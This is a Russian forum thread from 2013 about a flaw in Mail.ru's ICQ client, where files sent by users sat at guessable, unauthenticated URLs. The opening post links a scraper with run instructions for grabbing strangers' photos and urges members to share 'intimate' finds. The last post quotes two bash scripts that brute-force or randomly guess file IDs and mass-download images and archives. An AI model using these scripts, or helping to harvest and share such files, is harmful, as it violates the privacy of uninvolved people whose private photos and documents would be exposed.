Утечка файлов, переданных по асечке

В данном разделе практически не существует правил, здесь вас могут оскорбить и унизить всеми доступными способами.
Сообщение
Автор
Аватара пользователя
paleman
Полковник
Полковник
Сообщения: 2715
Зарегистрирован: 23.05.2007
Откуда: Outer Heaven
Благодарил (а): 376 раз
Поблагодарили: 1416 раз
Контактная информация:

#1 Сообщение 12.01.2013, 14:38

Ссылка на оригинальный пост.



Файлы, которые передавались через официальный ICQ-клиент от mail.ru, оказались в общем доступе


Все довольно просто — файлы хранятся на серверах mail.ru по ссылкам вида https://files.icq.net/files/get?fileId=XXXXXX, где ХХХХХХ — набор букв и цифр. Файлы эти общедоступны, никакой авторизации не требуется. Тут имеется скрипт, который граббит исключительно фоточки с серверов.

Почему это может представлять интерес? Да потому что там хранится множество фотографий, которые люди бы не осмелились выложить в паблик!

Сам скрипт (внимание, требуется java): https://rghost.ru/42926385
Исходники (для параниоков и кулхацкеров): https://pastebin.com/n1qpNM4y
Java: https://java.com/ru/download/index.jsp
Инструкция по запуску
1. Ставим Java.
2. Качаем скрипт (советую класть его в отдельную папку, т.к. скрипт создает много текстовых документов со ссылками)
3. Дважды кликаем на файл ifs.jar
4. Рядом со скриптом появляется папка out, в которой будут появляться фотки
5. Ждем и радуемся (на экране ничего происходить не будет, проверяйте папку)
Если хотите прервать граббинг фоток — убейте процесс ява-машины в диспетчере.
Предлагаю постить забавные (а, может, и интимные) находки в этой теме, пока лавочку не прикрыли. Интим под спойлер!

Добавлено спустя 4 минуты 20 секунд:
Первый ужас
Изображение

Аватара пользователя
Monk
VIP
VIP
Сообщения: 4713
Зарегистрирован: 21.11.2009
Благодарил (а): 418 раз
Поблагодарили: 1053 раза
Контактная информация:

#2 Сообщение 12.01.2013, 15:09

Ниработать.
«По ночам компьютеры собираются вместе и смеются над людьми, если те делают работу, которую могли бы делать компьютеры» (с) habrahabr
 
[hide_num=64]Изображение
Изображение

Не стоит становиться на одно колено ради девушки, которая ради тебя не готова встать на два. (С)
640K ought to be enough for anybody (с) BG[/hide_num]

Nasdaq
CSmania Linux Group
CSmania Linux Group
Сообщения: 1267
Зарегистрирован: 21.06.2012
Откуда: Владивосток
Благодарил (а): 66 раз
Поблагодарили: 287 раз
Контактная информация:

#3 Сообщение 12.01.2013, 15:17

Monk
работает, но у меня не одной нормальной фотки

Аватара пользователя
paleman
Полковник
Полковник
Сообщения: 2715
Зарегистрирован: 23.05.2007
Откуда: Outer Heaven
Благодарил (а): 376 раз
Поблагодарили: 1416 раз
Контактная информация:

#4 Сообщение 12.01.2013, 15:38

Осторожно
Изображение

Renaissance
Полковник
Полковник
Сообщения: 6942
Зарегистрирован: 03.06.2009
Благодарил (а): 2390 раз
Поблагодарили: 2807 раз
Контактная информация:

#5 Сообщение 12.01.2013, 16:04

С открытием. Давно уже так.

Аватара пользователя
SHADOW
Полковник
Полковник
Сообщения: 4024
Зарегистрирован: 13.05.2009
Благодарил (а): 61 раз
Поблагодарили: 327 раз
Контактная информация:

#6 Сообщение 12.01.2013, 16:36

Было бы интереснее, если бы скрипт находил приватные программы. Например архивы, в названии которых есть _private, _priv и т.д.

Аватара пользователя
NiGHt-LEshiY
Полковник
Полковник
Сообщения: 10258
Зарегистрирован: 13.06.2008
Откуда: Россия
Благодарил (а): 752 раза
Поблагодарили: 2667 раз
Контактная информация:

#7 Сообщение 12.01.2013, 17:04

SHADOW
Неужели кто-то файлы с приватными программами называет super_private_do_not_download_its_mine!.rar?
Кодекс поведения участников сообщества — обязательно к прочтению.
Просьба присылать сообщения об ошибках в ЛС.

Аватара пользователя
SHADOW
Полковник
Полковник
Сообщения: 4024
Зарегистрирован: 13.05.2009
Благодарил (а): 61 раз
Поблагодарили: 327 раз
Контактная информация:

#8 Сообщение 12.01.2013, 17:13

NiGHt-LEshiY
Обычно так и называют. Исхожу из личного опыта покупок программ.

Аватара пользователя
John13
Капитан
Капитан
Сообщения: 343
Зарегистрирован: 24.09.2009
Благодарил (а): 201 раз
Поблагодарили: 249 раз
Контактная информация:

#9 Сообщение 12.01.2013, 17:17

Файлы, которые передавались через официальный ICQ-клиент от mail.ru, оказались в общем доступе
А что с теми кто пользовался сторонними клиентами(миранда и др.)?

Аватара пользователя
CautionSparta
Модератор
Модератор
Сообщения: 1772
Зарегистрирован: 25.02.2012
Откуда: Киев, Украина
Благодарил (а): 913 раз
Поблагодарили: 2380 раз
Контактная информация:

#10 Сообщение 12.01.2013, 17:33

Где грязь, ужасы, интим?!

Renaissance
Полковник
Полковник
Сообщения: 6942
Зарегистрирован: 03.06.2009
Благодарил (а): 2390 раз
Поблагодарили: 2807 раз
Контактная информация:

#11 Сообщение 12.01.2013, 17:35

John13 писал(а): что с теми кто пользовался сторонними клиентами(миранда и др.)?
у них прямая передача файлов.

Аватара пользователя
Se7en
Капитан
Капитан
Сообщения: 419
Зарегистрирован: 21.09.2009
Откуда: Москва
Благодарил (а): 593 раза
Поблагодарили: 8 раз
Контактная информация:

#12 Сообщение 12.01.2013, 17:48

mail.ru - этим все сказано

Аватара пользователя
nikit-xxx
Лейтенант
Лейтенант
Сообщения: 208
Зарегистрирован: 28.11.2007
Благодарил (а): 44 раза
Поблагодарили: 5 раз

#13 Сообщение 12.01.2013, 17:56

ещё работает? у меня нет - "(nn) Connection reset" либо "(nn) Address already in use: connect"
Откуда иксы в моём нике
Изображение
Изображение
скачать С. Прата. Язык программирования C++. Лекции и упражнения. 5-е изд (*Выровнена нумерация страниц, *Содержание)
Краткая инструкция по созданию пиратки-распака CS/HL
Изображение
Использование тэга подсветки синтаксиса
[syntax lang="cpp" lines="n"]
#include <iostream>
using namespace std;

struct cl{
static void f() { cout << "Hi, user!\n"; }
int i;
};

int main()
{
cl::f();
//cl::i = 1;
return 0;
}
[/syntax]

Аватара пользователя
Rama
Модератор
Модератор
Сообщения: 1143
Зарегистрирован: 28.03.2008
Благодарил (а): 389 раз
Поблагодарили: 240 раз
Контактная информация:

#14 Сообщение 12.01.2013, 17:56

Кто-нибудь может поправить скрипт, чтобы выдавались только имя файла и ссылка? С сохранением в .txt, например.

Аватара пользователя
ArsNG
Полковник
Полковник
Сообщения: 3059
Зарегистрирован: 20.12.2007
Благодарил (а): 1069 раз
Поблагодарили: 2893 раза

#15 Сообщение 12.01.2013, 18:28

На хабре подсказывают:
перебор

Код: Выделить всё

#!/bin/bash
 
baseURL="http://files.icq.net/files/get?fileId="
 
for i in {A..Z} {0..9}; do
        for j in {A..Z} {0..9}; do
                for k in {A..Z} {0..9}; do
                        for l in {A..Z} {0..9}; do
                                for m in {A..Z} {0..9}; do
                                        for n in {A..Z} {0..9}; do
                                                fileID="$i$j$k$l$m$n"
                                                echo $fileID
                                                #curl -Of#L "$baseURL$fileID"
                                                wget -qc -t 2 -T 5 -A ".zip,.rar,.7z,.jpg,.jpeg,.bmp,.png,.gif" "$baseURL$fileID"
                                        done
                                done
                        done
                done
        done
done
рандом

Код: Выделить всё

baseURL="http://files.icq.net/files/get?fileId="
threads=10
cat /dev/urandom | tr -dc 'A-Z0-9' | fold -w 6 | \
while read fileID
do
   echo "$baseURL$fileID" 
done | \
xargs -n1 -P $threads wget -c -t 2 -T 5 -A ".zip,.rar,.7z,.jpg,.jpeg,.bmp,.png,.gif"

Ответить